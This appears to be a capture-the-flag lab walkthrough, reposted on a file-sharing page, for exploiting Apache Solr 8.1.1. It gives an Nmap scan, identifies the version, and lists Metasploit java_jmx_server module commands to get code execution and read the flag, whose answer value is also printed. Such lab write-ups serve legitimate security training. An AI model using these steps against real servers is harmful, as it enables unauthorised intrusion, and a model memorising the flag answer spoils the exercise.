walkthrough-1699.pdf

(1027 KB) Pobierz
Name
URL
Type
Vulnerable Search Platform
https://www.attackdefense.com/challengedetails?cid=1699
Metasploit: Latest Targets
Important Note:
This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.
Step 1:​
Run an Nmap scan against the target IP.
Command: nmap -p- -sS -sV 192.21.72.3
Step 2:
We have discovered apache solr and java rmi services are running on the target
machine. We will use access apache Solr application over port 8983 using firefox browser to
identify the application version.
Command: firefox 192.21.72.3:8983
Step 3:
The target is running apache Solr 8.1.1. Search on google "Solr 8.1.1 exploit" and look
for metasploit exploit modules.
Step 4:
Open Zdnet.com link:
https://www.zdnet.com/article/exploit-code-published-for-two-dangerous-apache-solr-remote-co
de-execution-flaws/
Target is vulnerable to JMX server java code execution. We can exploit the target using
following exploit module:
Metasploit Module:
https://www.rapid7.com/db/modules/exploit/multi/misc/java_jmx_server
Step 5:
Exploit the target using metasploit module.
Commands:
use exploit/multi/misc/java_jmx_server
set RHOSTS 192.21.72.3
set SRVPORT 9898
set RPORT 18983
check
exploit
cat /flag
This reveals the flag to us.
Flag:
a2ecff272ddf6aed64407a015b5bb125
References
Zgłoś jeśli naruszono regulamin